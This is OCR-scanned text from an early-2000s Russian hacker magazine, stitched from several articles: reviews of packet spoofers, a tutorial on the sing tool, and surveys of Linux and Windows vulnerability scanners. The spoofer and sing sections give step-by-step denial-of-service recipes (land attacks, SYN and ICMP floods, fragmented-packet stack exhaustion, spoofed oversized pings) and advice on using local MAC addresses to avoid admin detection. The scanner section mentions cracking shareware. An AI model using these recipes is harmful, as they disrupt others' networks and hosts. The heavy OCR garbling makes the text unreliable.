load/netxray.zip, найдено Ha первой 
странице yandex-a. Если сайт и от- 
валится после выхода журнала, 
найти будет нетрудно. 


Глюк с определением сетевухи 
nog Windows 2000 


После установки запускаем и ви- 
дим несколько окошек. Давим на 
трубу со стрелочкой, направленной 
на выход. И попадаем в спуфер. 
Тут есть редактор пакетов, то есть 
ты можешь сделать весь пакет сам. 
Можно также запустить его на 
прослушку, это труба со стрелоч- 
кой на вход. Затем на квадрат с би- 
ноклем. Выделяй пакеты, которые 
хочешь слать, и делай правый клик 
по ним. Найди «send this packets» и 
ты увидишь, как они вылетят от те- 
бя. Режимов посылки у него нес- 
колько, ты можешь слать по OGHO- 
му, по несколько (укажи в окошке, 
сколько раз послать). Или беско- 
нечно много (continuously), что по- 
лезно при забивании мусором пор- 
та или при °уп-флуде. Не забывай 
про ID пакета. Если слать один и 
тот же пакет, то машина примет 
только первый, а остальные посчи- 
тает за дупы. Поэтому лучше для 
флуда отправлять пачку из 10-20 
перехваченных пакетов. 

Прога умеет сама считать конт- 
рольную сумму, но ты можешь ее и 
подкорректировать вручную, хотя 
на практике ничего хорошего из 
этого не выйдет. Можно задавать 


ИА 
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вручную данные внутри пакета и 
менять флаги (rst, fin и прочие). 
Можно даже сделать левый пакет, с 
большей длиной, чем реально есть 
данных. Можно сделать пакет для 
land-ataku, для этого надо поста- 
вить одинаковые Source и destina- 
tion IP и одинаковые порты. При 
этом порт должен быть открыт. Ес- 
ли тачка не патченная и ось там не 
больше 95, то она отвалится в то- 
тальный даун. Если хочешь испу- 
гать друга линуксоида, то поставь 
на прослушку исходящие пакеты 
ТСР и вруби npory-cpnygep, напри- 
мер, portfuck. После отлова 10-20 
пакетов тормози их обоих, выделяй 
пакеты и говори «слать gO посине- 
ния». Если на линухе есть откры- 
тый порт и ты именно его portfuck- 
ал, то на компе начинает очень 
страшно тарахтеть винт. Ничего ре- 
ально страшного не происходит (по 
крайней мере в ближайшие 15-20 
минут), но звучит это неприятно. 
Используя битую фрагментацию 
пакета, можно засрать стек на чу- 
жой машине. Для этого надо наст- 
роить снифер на поимку исходя- 
щих |СМР-пакетов. Хорошенько 
пингануть машину пакетом на 60 
кило, желательно не один раз. Пос- 
ле чего, поковырявшись во внут- 
ренностях, надо стереть последний, 
завершающий пакет, именно после 
него машина начинает отвечать на 
пинг. Если он не пришел, тачка бу- 


чужого ружья, причем ни жертва, ни хозяин ружья об этом ничего не узнают. 


Прога, «слушая» которую можно 
сделать хороший $У№-флуд 


Если сделать серию из 10 неза- 
вершенных пакетов и послать ее 
раз 100, то отожрется солидный ку- 
сок КАМ, а из-за корявого стека не 
все пакеты корректно отчистятся. 
Тут хорошо заметен глюк мастдай- 
ной реализации стека. Пишутся в 
память все пакеты, если ID не сов- 
падает с последними десятью. А 
удаляются только первые. Таким 
образом, получив 50 серий по 10 
пакетов, тачка подождет и сотрет 
только первые 10. Можно так же за- 
мутить и ТСР соединение, но в этом 
случае геморроя будет больше. 


EXPLOITGENERATOR 

Качать можно отсюда http://packet- 
stormsecurity.org/DoS/expgen085.zip. 
Антивирус МсАНее и некоторые 
версии AVP ругаются на него, типа 
«вирус не надо запускать». Можно 
смело положить на это. Страшная 
прога, жаль, что не работает под 


С помощью хорошего спуфера можно 
провести практически все атаки, связан- 
ные с кривостью [Р-стека. 


дет хранить все остальные пакеты, 
пока не истечет тайм-аут. В локалке 
это будет выглядеть вечнозеленым 
глазом на хабе и сетевухе. На тачке 
чувствуется явное торможение. 
При этом фаерволлы грустно мол- 
чат, поскольку пакетов толком ни 
одного не пришло. 


2К'шкой, а рассчитана только на 95 
и 98 форточки. 

После запуска вываливается окно 
формирователя пакета. Первое no- 
ле - это IP-npotokon. Можешь за- 
дать стандартный протокол из вы- 
падающего списка, можешь напи- 
сать что-нибудь свое. IP src и IP dst 
- это исходящий и входящий адреса. 


IP Tos, none IP-xegepa, type of serv- 
ice - что есть тип услуги или что 
именно мы хотим делать. Особой 
роли на завал не оказывает. Time 
to live или И! это количество роуте- 
ров, которое можно пройти пакету 
перед смертью. Если поставить 
слишком маленькое число, пакет 
может умереть, не дойдя go agpeca- 
та. Хотя в локалке без роутеров 
можно ставить и маленькое число. 
Fragment off - смещение фрагмента- 
ции, то есть на сколько второй ку- 
сок отстает от первого. Помогает, ес- 
ли ты решился сорвать стек TCP/IP 
распаковщика. P.ID - это тот самый 
ID пакета, по которому комп понима- 
ет, видел он его или еще нет. И если 
он будет повторяться, то система 
просто проигнорирует пакет. Ну, с 
checksum все понятно, эта прога то- 
же умеет считать ее сама. 

Это все касалось 1Р-уровня. Даль- 
ше у тебя есть выбор. Или посы- 
лать ТСР пакеты, или ICMP. В TCP 
пакетах есть возможность назна- 
чить Sequence и acknowledge номе- 
ра; для определения, к какому кон- 
некту относится этот пакет, может 
пригодится при TCP-hijack. Хотя py- 
ками эту операцию провернуть 
практически нереально. 

Параметры WinSize и УБР отно- 
сятся к MTU-level, то есть к тому, 
как передавать пакет. Конечно, ре- 
бята не забыли про флаги - уста- 
навливай все, что душе угодно. Ни- 
же есть опции «сколько штук 
слать» и «как часто это делать». 
Если поставить очень маленькое 
число в паузе, то прога получается 
очень даже неплохим флудером. 
Проблема только в том, что она 
часто делает вид, что послала, но 
реально с машины не вылетело ни 
байта. Примечательно, что для 
стандартных syn-flood со спуфом 
исходящего IP, а также для smurf-a 
есть стандартные кнопочки. Все это 
удовольствие находится во вклад- 
ке Simple mode. Так что для прос- 
тых операций не стоит заморачи- 
ваться и клепать пакеты руками. 


PACKET BUILDER 

Прога для посыла пакетов. Автор 
клянется, что работает под любой 
осью. В реальности же оказывает- 
ся, что под 2k прога конкретно про- 
гоняет с контрольной суммой, отче- 
го пакеты рубятся на первом же ро- 
утере. А если ты сидишь на модеме, 
то гробятся они уже на другом кон- 
це твоего телефонного кабеля. Кро- 
ме того, при некоторых условиях в 
сеть не вылетает вообще ничего, то 
есть пакеты успевают умереть еще 
на твоей тачке. Интерфейсик неза- 
мысловатый: можно задать исходя- 
щий и входящий адреса и порты, 
количество посылаемых пакетов и 
флажки. Есть возможность засы- 
лать пакеты с рандомных адресов, 
для этого нужно поставить галку на 


НОМИТО/ГНУТЫЙ СТВОЛ ПОПАДАЕТ ДВАЖДЫ! 


Как оно работает nog Windows 98 


randomized source. Там, где при за- 
пуске написано data То send, мо- 
жешь писать послание на ту сторо- 
ну. Если там :) отловят пакеты, они 
будут содержать именно эти дан- 
ные. Packet len и forced len - это 
длина пакета. Первая цифра - это 
вычисленная длина, вторая - на тот 
случай, если ты хочешь послать 
больше, чем написал. Ниже идет 
лог работы программы. Тут ты смо- 
жешь наблюдать все действо. Ну и 
главная красная кнопка «Send», что 
есть «послать». Как только ты наст- 
роишь все как тебе надо, дави на 
кнопарь и смотри, что вылетает с 
твоего компа. Прогу не получится 
использовать как Smurf-epa, потому 
как она не умеет слать icmp пакеты. 
Также бесполезно при помощи нее 
что-либо ломать, поскольку полови- 
ну пакета она просчитывает сама, а 
следовательно, не даст тебе поме- 
нять смещение фрагментации или 
syn номер последовательности. По 
сути, она умеет слать только один 
единственный вид пакетов - это 
первый пакет из серии «тройное ру- 


копожатие». Все эти пакеты не уста- 
навливают реального соединения, в 
файрволле они могут даже не поя- 
виться. Единственное, что можно 
сделать страшного этой прогой, это 
забить чей-то канал. Но это только 
в том случае, если от тебя можно 
отправлять пакеты с левый адресом 
отправителя. 


Ее В - z 
Bungep пакетов, набор стандартных 
параметров IP 


ЕТТЕВСАР 

В отличие от всех, эта прога умеет 
спуфить только ARP пакеты. Зато 
делает это она просто прекрасно. 
Мало кому может понадобиться 
ручная отправка, но не упомянуть 
о ней нельзя. Особенно учитывая, 
что это чуть ли не единственная 
версия проги, которая с горем по- 
полам, но пашет под 2k виндами. 


НЕУДАЧНИКИ 

Что не пошло в корне. IRX 1.5 - noc 
ле настройки сетевой карты, при 
попытке сканирования просто па- 
дает в синий дамп вместе с виндой 
win2k SP3. Хотя обещали, что соз- 
дана прога именно для win2k. 
PacketX - после распаковки nog 
двухтысячник отказался подгру- 
жать свой драйвер, банально за- 
бив на кнопку load driver. Без него 
не работает, говорит - «ошибка при 
общении с моими дровами». Под 
98-ми просто послал всех, обещая 
работать только под МТ-ей. В об- 
щем, непонятно, что именно чувак 
хочет от машины. 


В ЦЕЛОМ 

Как ты уже понял, со спуферами в 
стране напряженка. Но все же сто- 
ит завести на компе старушку 
WIN98 хотя бы для юзанья первых 
двух прог. A ettercap просто необ- 
ходим всем, живущим в страшных 
локалках, где IP привязан к МАС :). 


Tan 
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Из-за кривого 
winsock-a ни 
одного нор- 
мального спу- 
фера на винде 
пока нет. 


уэечу 950 


НОМ/ТО/НАКОРМИ СЕРВАК ЯДОВИТЫМ ПУДИНГОМ! 


ОЗы 4hack 


Sing также 
входит в набор 
пакетов хаке- 
рской оси 
Trinux 
(http://trin- 
их.зоигсе- 
forge.net/), 
так что, если 
всегда хочешь 
иметь под ру- 
кой необходи- 
мый набор 
утилит, сове- 
тую обзавес- 
тись именно 
Trinux'om 


Ушаков Андрей 
aka A-nd-Y (Andy_@timus.ru) 


о, как понимаешь, этот 

незамысловатый метод 

- не для нас. Настоя- 

щий хакер всегда по- 
пытается досконально разобраться в 
каждом случае, который будет ему 
хоть сколько-нибудь интересен. На- 
деюсь, ты относишь себя к таковым? 
Если да, то очень за тебя рад - у тебя 
многое получится. Думаю, никто не 
будет спорить, что спуфинг заслужи- 
вает подробного изучения, так как 
позвопяет лучше понять принципы 
работы сети. 


SING - НАШ ЧЕЛОВЕК! 

Итак, я хочу рассмотреть на практике 
построение сетевых пакетов, чем, в 
общем-то, и является спуфинг. Для 
этого мы воспользуемся программой 
sing, которая позволяет задать 9ос- 
таточное количество параметров и 
таким образом создавать пакеты с 
нужными характеристиками. 

Почему именно sing? Sing работает с 
протоколом icmp (также может созда- 
вать пакеты других типов, таких как 
UDP и ТСР), который больше всего 
подходит для начального изучения се- 
тевых протоколов на практике. На нем 


НАКОРМИ СЕРВАК 
ЯДОВИТЫМ ПУДИНГОМ: 


СТРОИМ СВОИ СОБСТВЕННЫЕ ПАКЕТЫ В ЛИНЕ 


уапаех.ги? :) 


gzip -d SING-1.1.tgz 
tar -xvf SING-1.1.tar 


После чего переходим в распако- 
ванную директорию. Установка 
программы стандартная: ./configure 
(./configure --help, если интересны 
дополнительные опции), таке, 
make install. Все команды делаются 
из корня распакованной диры. 

После того как $тд установлен, 
можно заняться непосредственным 
его изучением, а заодно затронуть 


До того как начнешь синговать с 
помощью какого-нибудь снифера, узнай 
МАС адреса в своей локалке и указывай 
при отправке ложных пакетов именно их, 
так как админ легко сможет обнаружить 
в случае необходимости, с какого компа 

шли зло-пакеты 


проще показать основные принципы 
построения пакета, так как он содер- 
жит меньше параметров, чем, напри- 
мер, ТСР пакет. Также не стоит забы- 
вать, что на протоколе icmp основана 
маршрутизация, понятие принципов 
которой также не будет лишним. 


ВРУБИМ И ВРУБИМСЯ 
Устанавливаем Sing. Качаем архив 
SING-1.1.tgz с сайта http://source- 
forge.net/projects/sing/. Архив ве- 
сит чуть больше 400 КБ, так что 
скачать его не составит труда. Рас- 
паковываем архив: 


me 


== 
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некоторые аспекты из теории про- 
токолов TCP/IP стека. 

Для начала рассмотрим общие па- 
раметры работы программы. Прос- 
тые команды Sing сходны с ping 
(sing вообще призван заменить ping 
как гораздо более функциональное 
и гибкое средство по работе с icmp, 
к тому же надо учесть, что sing 
включает в себя все функции ping). 

В простейшем случае запускается 


аналогично ping с теми же функциями: 


sing 10.26.22.65. 


Простейший спуфинг осуществля- 
ется с применением опции -5: 


sing 10.26.22.65 -S 10.26.22.99 


Делаем пинг, подставляя ложный 
адрес в отправляемые пакеты. 

Это самое простейшее примене- 
ние программы Sing, которое сго- 
дится лишь для примитивных за- 
дач, но для более серьезных задач 
требуется использование более 
сложных параметров, которые мы 
почекаем далее. 


™=j" - позволяет указать интер- 
фейс, который следует использо- 
вать при работе с пакетами; 


"-5" - задает размер отправляе- 
мого пакета в байтах, указание это- 
го параметра в значение тах, поз- 
воляет отправлять максимально 
большие пакеты; 


"=prot™ - задает протокол для 
отправляемого пакета, например, 
ТСР, UDP, ICMP; 


"-5ед" - позволяет задать номер 
пакета в последовательности; 


"=ip_id"™ - идентификатор пакета; 


™=[t™ - время жизни пакета в Ce- 
KYHgax; 


"=TOS" - задает значение поля тип 
сервиса (type of service). Это тип тре- 
буемого обслуживания соединения 
для управления его рабочими характе- 
ристиками. В частности, ТО$ позволя- 
ет задать приоритет для конкретного 
пакета при его передвижении по сети. 

Задание ТО$ осуществляется запол- 
нением восьми полей. Первые три по- 
ля задают приоритет при передвиже- 
нии по сети. Следующие три поля: по- 
ле задержки, поле пропускной способ- 
ности, поле достоверности. Задание ка- 
кого-либо из полей в 1 дает высокий 
уровень требуемого параметра, O - 
нормальный уровень. Оставшиеся два 
поля зарезервированы и не использу- 
ются. Поле приоритета может прини- 
мать, например, такие значения: 000 - 
обычный приоритет, О1 - мгновенная 


доставка. TOS позволяет таким обра- 
зом задавать параметры обработки па- 
кета при прохождении его через сеть. 


"-М" - задает тип операционной 
системы в виде win, linux и T.g.; 


"-МАС"" - позволяет установить 
нужный МАС адрес на отправляе- 
мых пакетах; 


"=t™ - задает время жизни пакета 
ТТЕ, рекомендуемое значение на 
данный момент - это 64 (максималь- 
ное может быть 255), но многие 
системы устанавливают свой TTL. 

По мере прохождения через марш- 
рутизатор изначальное значение 
TTL уменьшается на единицу, поэто- 
му можно определить примерное ко- 
личество маршрутизаторов (хопов), 
через которое прошел пакет. 

TTL устанавливает, таким образом, 
максимальное количество маршрути- 
заторов, через которое может пройти 
пакет. Пакет с TTL, равным нулю, ав- 
томатически отбрасывается маршру- 
тизатором и заканчивает свой путь в 
сети, а маршрутизатор посылает от- 
вет с полем time exceeded об истече- 
нии времени жизни пакета. 

Таким образом на основе icmp и 
производится маршрутизация в се- 
ти при помощи выяснения доступ- 
ных хостов, количества хопов и т.д. 


Пример запуска: 


sing -i ethO -s max -prot icmp -5 
212.23.95.146 212.23.95.147 


Засылаем кучу огромных пакетов 
на хост 212.23.95.147 от имени 
212.23.95.146 (параметры -S). 


Вот что показывает нам tcpdump: 


17:35:12.332005 212.23.95.146 > 212.23.95.147: 
icmp (frag 13170:1480@1480+) 
17:35:12.332022 212.23.95.146 > 212.23.95.147: 
icmp (frag 13170:1480@2960+) 
17:35:12.332037 212.23.95.146 > 212.23.95.147: 
icmp (frag 13170:1480@4440+) 


НАВОРОТЫ 

В программе есть такая интересная 

опция, как определение операцион- 

ной системы удаленного хоста. Эту 

опцию задает параметр "-О". 
Например: 


sing -0 212.23.95.147 


locum с поддельным айпишником 


НОМ/ТО/НАКОРМИ СЕРВАК ЯДОВИТЫМ ПУДИНГОМ! 


После завершения работы будет 
выдано такое сообщение: 


--- 212.23.95.147 sing statistics --- 

2 packets transmitted, 2 packets received, 
0% packet loss 

round-trip min/ava/max = 0.835/0.939/.044 ms 
<*> Remote OS on 212.23.95.147 is a WindowS 2k. 


Опция "-р" позволяет задать со- 
держимое отправляемого пакета в 
виде обычного текста: 


sing 212.23.95.145 -р 'You are hacked by cool 
HACKER' 


Напомню, все операции sing долж- 
ны выполняться с правами root, так 
как требуется непосредственная ра- 
бота с сетевым интерфейсом. 

Как видишь, даже перечисленные 
мною параметры уже дают возмож- 
ность достаточно гибкого форми- 
рования пакета, а в Sing еще нема- 
ло параметров. 


Я ТЕБЕ ОДИН 

УМНЫЙ ВЕЩЬ СКАЖУ! 
Полезный совет. До того как начнешь 
синговать с помощью какого-нибудь 
CHUcpqpepa, узнай МАС адреса в своей 
локалке и указывай при отправке лож- 
ных пакетов именно их, так как админ 
легко сможет обнаружить в случае не- 
обходимости, с какого компа шли зло- 
пакеты. Почему нужно использовать 
маки именно из твоей локалки? Просто 
на маршрутизаторах, если админ не 
полный дурак, стоит ограничение по 
только известным адресам, поэтому 
произвольный мак юзать не получится. 


МАРШРУТЫ ХАКОВСКИЕ... 

Как я уже говорил, $тд лучше все- 
го работает с icmp. В частности, у 
него есть немало опций, связанных 
с маршрутизацией при помощи 
1стр-пакетов. Например, задание 
типа !стр-пакета (указывается пос- 
ле опции "-х"): 


Сингуем... 


host-unknown - неизвестный хост; 

host-unreach - хост недоступен; 

time_exe - истечение времени 
жизни пакета; 

redirect - редирект пакетов через 
другой роутер. 


Типов icmp еще достаточно много, 
ия не буду перечислять их все. От- 
мечу лишь то, что задание опреде- 
ленного типа icmp с определенными 
параметрами и пересылка пакетов, 
например, на роутер от определен- 
ного хоста, может изолировать этот 
хост на определенное время. Ведь 
именно на {стр основана маршрути- 
зация в Интернете. Секи фишку! 

Все опции, которые остались вне 
этой статьи, хорошо описаны в "тап 
sing", так что настоятельно рекомен- 
дую тебе его прочитать - лишним это 
точно не будет. Тогда ты сможешь ис- 
пользовать SING очень эффективно. 

В sing также есть множество оп- 
ций, которые требуют изучения спе- 
циофики сетевых протоколов, сете- 
вой маршрутизации, структуры па- 
кетов. Для этого нужно прожевать 
не одну толстенную книжку, но сто- 
ит того, если ты действительно хо- 
чешь стать гуру в своем деле. 
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Инфы по cny- 
фингу в Инете 
довольно мало, 
поэтому реко- 
мендую тебе 
искать ее не- 
посредственно 
по специфика- 
циям нужного 
протокола - 
пользы будет 
больше 


Для изучения 
спуфинга ис- 
пользуй сниф- 
фер - в этом 
деле он будет 
твоим лучшим 
помощником 
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СКАНЕРЫ БЕЗОПАСНОСТИ ДЛЯ LINUX 


Vitls (vitls@chat.ru) 


сли ты хоть раз смотрел Ka- 
кое-нибудь известное кино 
про какую-нибудь войну (Рэм- 
бо 3, например), то ты наверняка заметил, 
что, перед тем как сунуть свой нос в непо- 
ложенную дыру, славный парень - главный 
герой - всегда проводит такую операцию, 
как разведка. Если он этого не сделает, то 
обязательно заденет какую-нибудь сигнали- 
зацию, потом его быстро-быстро поймают и 
повесят. Да чего далеко ходить, вниматель- 
но посмотри Матрицу-2. Есть эпизод, в кото- 
ром Тринити сначала просканировала сеть 
(она, кстати, использовала программу 
птар), увидела потенциально дырявый сер- 
Buc (ssh), а потом применила программу- 
эксплоит (sshnuke) для получения доступа к 
системе с правами суперпользователя (я 
валяюсь! :)). Все видно на кадре из фильма 
по адресу http://packetstormsecurity.nl/unix- 
humor/nmap-matrix2log.jpg. 


СКАН В СЕТИ - НОРМА ЖИЗНИ! 
Абсолютно такая же ситуация происходит и в 
Сети. Не нужно ломиться в чужую сеть или на 
чужой узел, предварительно не проверив ее и 
не собрав о ней необходимую информацию. 
Для этих целей я предлагаю на некоторое вре- 
мя стать... администратором исследуемой сети. 
Что? Испугался? И правильно. Надо бить вра- 
га его же оружием. Твоя задача, перед тем как 
провести сбор данных об удаленной системе, - 
представить себя в роли администратора сети, 
потенциально подверженной атаке. Почув- 
ствуй себя в шкуре админа и научись думать 
как админ. Подумай, как бы ты смог защитить 
сеть, какие меры мог бы ты принять для предо- 
твращения атаки. Потом придет понимание то- 
го, КАК надо собирать информацию об yga- 
ленных сетях и узлах. А чтобы это сделать, те- 
бе нужен некоторый набор специальных прог- 
рамм. Набор, который покажет уязвимые места 
и даст наводки для закрытия дыр. 


АРСЕНАЛ 

В арсенале хороших администраторов се- 
тей находится обязательный набор прог- 
рамм для анализа состояния безопаснос- 


Рис. 1. Умненький рег!-скрипт hackbot 


ти сетей и узлов. Общее название этих 

программных средств - комплексные ска- 
неры безопасности. Под это определение 
подпадают и сканеры портов, собственно 
сканеры безопасности и скрипт-сканеры. 

На сканерах портов мы с тобой долго оста- 
навливаться не будем. Наверняка об этих 
программах-труженицах написаны вагоны 
слов (ну, ты уже в курсе про прогу птар и 
все такое). Вот остальное - то, что нам нужно. 

Начну, пожалуй, с самого простого. 
Скрипт-сканеры - очень узконаправлен- 
ное оружие. Их основная задача помочь 
исследователю системы, обнаружить на 
удаленной машине службы, обеспечиваю- 
щиеся сценариями. Типичный пример - 
с9!-сценарий на web-cepBepe. Если запись 
об обнаруженном сценарии присутствует 
в специальной базе сканера, то сканер 
создаст отчет, в котором опишет дырку и 
даст рекомендации по ее использованию 
или устранению (все зависит от того, кто 
такой сканер писал). 

Теперь несколько слов о сканерах безо- 
пасности. Сканер безопасности по типу 
воздействия на исследуемые системы яв- 
ляется активным (да, в общем-то, все ска- 
неры - активное средство). Это значит, что 
твои действия могут быть обнаружены ад- 
министратором. Бояться этого не надо. В 
логах изучаемой сети или хоста сканиро- 
вание комплексной безопасности будет 
выглядеть как сканирование портов. Но 
это все ерунда. За простое сканирование в 
тюрьму не посадят (тебя же не сажают за 


то, что ты разглядываешь витрину 
магазина, хотя охрана тебя видит, 
впрочем и знает, что витрина защи- 
щена датчиком сигнализации). 
Сканер безопасности действует 
так. Сначала он просматривает сис- 
тему на предмет открытых портов. 
Затем он по очереди делает попыт- 
ку соединиться с каждой открытой 
службой. По ходу старается опреде- 
лить версию программы-сервиса и, 
по возможности, версию операци- 
онной системы. Покопавшись в сво- 
ей базе данных, сканер “вспомина- 
ет", какие дыры были когда-то най- 
дены в этом сервисе. Если таких ба- 
гов в базе не обнаружено, он поста- 
рается их поискать самостоятельно 
на основе набора известных мето- 


Рис. 2. Май - быстрый и стабильный 


дов (переполнение буфера, стека и 
т.п.) из другой базы. Потупив таким 
макаром некоторое время, сканер 
создает отчет, в котором он расска- 
жет тебе, какие уязвимости найде- 
ны в твоей системе, насколько они 
серьезны и чем опасны. Вот ради 
этого отчета все и затевается. 


ВЕЛИКИЙ СВЯТОЙ 

Обзор программ стартанем с самого 
древнего и, можно сказать, класси- 
ческого инструмента для проверки 
безопасности сетей и узлов. Saint 
(http://www.wwdsi.com/saint/) свое 
название берет от сокращения пол- 
ного названия Security 
Administrator's Integrated Network 
Tool - интегрированный инструмент 
администратора безопасности сети. 
Свое происхождение берет от древ- 
него средства проверки безопаснос- 
ти под названием SATAN. Его осо- 
бенности (фичи) включают сканиро- 
вание сквозь файрволлы, обновле- 
ние проверок с досок объявлений 
CERT и СПАС, четыре уровня серьез- 
ности уязвимостей (красный, жел- 
тый, коричневый и зеленый). Демон- 
страцию можно глянуть тут - 
http://www.wwdsi.com/demo/saint/sa 
int.html, скачать программу можно 
отсюда - http://www.saintcorpora- 
tion.com/downloads/saint-install- 
4.3.92. Программа коммерческая. Но 
вполне бесплатна для некоммерчес- 
кого использования. Для работы с 
нею потребуется web-browser. Отчеты 
saint выдает в формате html, основ- 
ной интерфейс работы также html. 


ХАКБОТ 


Довольно веселенькая утилита ска- 
нирования некоторых дырок в сд! и 
некоторых сервисах называется 
hackbot (рис. 1). Ее дом построен тут: 
http://ws.obit.nl. По своей сути прог- 
рамма является обыкновенным perl- 
скриптом, который просматривает 
указанный узел на предмет уязви- 
мостей в ряде служб. Так что устано- 
вить и запустить его несложно, был 
бы perl в системе. Возможно, что для 
этой программы тебе придется уста- 
новить дополнительные рег|-модули. 
Название ты увидишь в ругани при 
запуске программы, а взять можно с 
сервера www.cpan.org, там хороший 
поиск. По виду hackbot можно наз- 


вать скрипт-сканером, потому что он 


Рис. 3. Мониторщик сети nagios 


умеет искать уязвимости в со. Ка- 
чать отсюда: http://ws.obit.nI/hack- 
bot/hackbot-2.21.tgz. 


NSAT 

Программа nsat (http://nsat.sf.net) 
есть быстрый, стабильный сканер 
безопасности, созданный gna про- 
верки удаленных сетей и анализа на 
наличие уязвимостей и проблем с 
безопасностью (рис. 2). Программа 
умеет собирать информацию об уз- 
лах сети независимо от наличия или 
отсутствия дырок. Слить можно от- 
сюда - http://prdownloads.source- 
forge.net/nsat/nsat-1.5.tgz. В архиве 
лежат исходные тексты, которые 
нужно сконфигурировать, а потом 
собрать и установить (configure; 
make; make install), то есть стандарт- 
ным для unix-like систем способом. 


NAGIOS 
Следующая программа сканером по 
сути не является (рис. 3). Ее основ- 
ное применение - мониторинг сети и 
сетевых сервисов по нескольких 
различным протоколам (SMTP, POP3, 
HTTP, NNTP, PING, etc). Посмотреть 
на нее можно Ha сайте 


http://www.nagios.org. Документацию 


ищи там же. Как основное средство 
разведки программа мало полезна, 
но как дополнительное - вполне ни- 
чего. Интерфейс пользователя тре- 
бует наличия меБ-Бгомзег"а. 


ОХОТНИК ЗА ДЫРАМИ NESSUS 
Самым шикарным инструментом для 
анализа удаленной системы все мои 
знакомые Ипих-администраторы на- 


зывают программу Nessus (рис. 4). Ее 
родной дом расположен по адресу 
http://www.nessus.org. В принципе, 
одна эта программа может собой за- 
менить все вышеперечисленные. 
Удобство и простота использования, 
информативность, огромная, посто- 
янно обновляющаяся база уязвимос- 
тей делают Nessus самым лучшим 
инструментом для анализа и pasBeg- 
ки под Linux. Программа состоит из 
двух частей: серверной (демон пез- 
susd) и клиентской. Серверная - про- 
водит сбор информации и анализ, 
клиентская - предоставляет резуль- 
тат анализа в человекочитаемой 
форме. Кроме всего прочего, к прог- 
рамме можно подключать модули 
для обеспечения лучшего качества 


Рис. 4. Nessus великий и ужасный 


сбора и анализа данных. Небольшой 
набор можно взять с сайта проекта. 


ПАРА СЛОВ НАПОСЛЕДОК 
Собранной данными программами 
информацией можно распорядить- 
ся по-разному. Админы таким обра- 
зом узнают о дырах в своей систе- 
ме и принимают меры по их закры- 
тию. Ну а злобные дядьки могут и 
неприятностей натворить. Так что 
смотри и думай сам, что почем. 
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КТО ПОСЛЕДНИЙ 


НА АНАЛИЗЫ? 


АНАЛИЗАТОРЫ БЕЗОПАСНОСТИ ПОД WINDOWS 


Xander (net@upv.vodokanal.spb.ru, 
xander@spb300.com) 


Как сказано 

на сайте раз- 
работчиков: 
"X-Spider no 
возможностям 
не уступает, а 
местами и пре- 
восходит изве- 
стные сканеры 
безопасности 


Количество 
проверяемых 
уязвимостей в 
Retina увеличи- 
вается с каж- 
дым днем, так 
что обновляйся 


Что бы там не говорили, а от Винды нам не избавиться. Она стоит и дома, и в офисе, 


так что ось эта имеет пока право на существование :), поэтому и анализаторы 


безопасности под нее также имеют это право. Более того, без них просто зарез! 


так, сегодня в меню на- 
шего ресторана следу- 


ющие продукты: старые 


кони, которые борозды не портят - 
Retina, nmapwin_1.3.0 и X-spider. К 
этой теплой компании прибились - 
IPSwitch WhatsUp Gold 7.04, STAT 
Scanner Professional 5.03 Build 1161, 
The ISS Internet Scanner 6.2.1. 

Нашему потребителю известны He- 
которые представители данного се- 
мейства, поэтому на них я не буду 
очень замыкаться, а подробнее рас- 
скажу о малознакомых представите- 
лях анализаторов. 


The ISS Internet Scanner 6.2.1 
(Shareware) 

Искать по адресу 
http://www.iss.net/. 

Bec около 33 мегабайт. 

Язык - английский. 

Имеет в базе около 6000 уязви- 
мостей. 


Я юзал именно эту версию, потому 
что нашел под нее лекарство, а на 
последнюю пока не нарыл :(. Ждем, 
провизоров :). Итак, ставим, лечим, 
перезагружаемся. Ребут обязате- 
лен, а то он тебя затрахает идиотс- 
кими вопросами про ОБВС-шные 
базы данных, в которых ему следу- 
ет хранить данные от сканов и про- 
чего. Проще перегрузиться - тогда 
он найдет все сам. 

Итак, прога предназначена для ска- 
нирования и определения уязвимос- 
тей на: роутерах, веб-серверах, МТ- 
серверах, Unix-cepBepax, файерволах 
и рабочих станциях. Запускаем. Для 
начала он предлагает выбрать поли- 
тику сканирования: база данных, сер- 
вер под Buxgoi, веб-сервер под Вин- 
дой, юникс-сервер, юникс-веб-сервер. 
Интерсейс - довольно удобный, сле- 
ва в столбик вся инфа о дырках, 
справа описание этой дырки. Плохо 
только то, что приходится подробное 
описалово на багу искать самому :(. 

Фичи: написание собственных 
FlexChecks, то бишь скриптов, напи- 
санных на С или на Perl, которые бу- 
дут делать именно те проверки, кото- 
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Судя по верхней строчке - DoS могу огрести легко. 


рые нужны именно тебе в данном слу- 
чае. Имеется пример - проверка ICQ 
сервера. Есть возможность запуска в 
командной строке, что не может не 
радовать. Рапорт выдается достаточ- 
но подробный: помимо необходимого, 
в отчете имеется куча инфы, которая 
на первый взгляд не очень важна, но 
может и пригодиться. 


HYMEPO ДУО 


Stat Scanner (Shareware). 
Тырить тут: 
http://premier.harris.com/STAT. 
Вес около 19 мегов. 

Язык - английский. 


В сопроводиловке говорится, что сис- 
тема используется в Армии США, Фе- 
деральной почтовой службе и так да- 
лее и тому подобное. То есть, вроде 
как, можно и доверять :). По крайней 
мере изучим материальную часть на- 
иболее вероятного проти... союзника. 
В архиве более 3000 уязвимостей, 
что для первого раза может удовлет- 
ворить, но ничто не мешает качнуть 
обновления. Если удастся нормально 
вылечить, получишь немеряные пра- 
ва - права армейских хакеров :). Так и 
говорит: "армейские привилегии" :). 
Если не удастся, получишь право на 


скан одной единственной машины, 
один раз :(. Продукт мощнейший, на- 
вороченнейший. Мне очень понра- 
вился. Интерфейс стандартный для 
подобного сорта программ. Есть опре- 
деленные примочки, добавляющие 
этой программе прелести. 

Что порадовало до визга - так это 
рапорт! Да уж! Рапортует он не по-ар- 
мейски... нелаконично. На одну дырку 
выдает до десятка линков - эксплои- 
ты, патчи, мануалы. Объяснения каж- 
дой уязвимости тут же в наличии, за 
более подробными милости просим 
на сайт, предложения протестировать 
каждую дырку в отдельности (очень 
удобно, кстати) - нашел дыру, пропат- 
чил, тут же протестил, без необходи- 
мости гнать весь скан заново. 


ISS в работе. Не так все и плохо :, 


Чува-а-а-а-а-а-а-ак! 


WASSSUP?!! 
Следующим пойдет WhatsUp! Gold от 
старика Ipswitch. 


WhatsUp! Gold (Shareware) 

Брать - www.ipswitch.com. 
Дистриб - около 10 мегов (зависит 
от комплектации). 


Вообще, вещь достаточно специ- 
фичная, потому как не предназначе- 
на для анализа безопасности машин 
:). Слышу крики: "А на фига ты тут нас 
паришь?" Объясняю. Предназначена 
она для построения карты сети с оп- 
ределением сервисов на запущенных 
машинах. Построив карту своей сетки, 
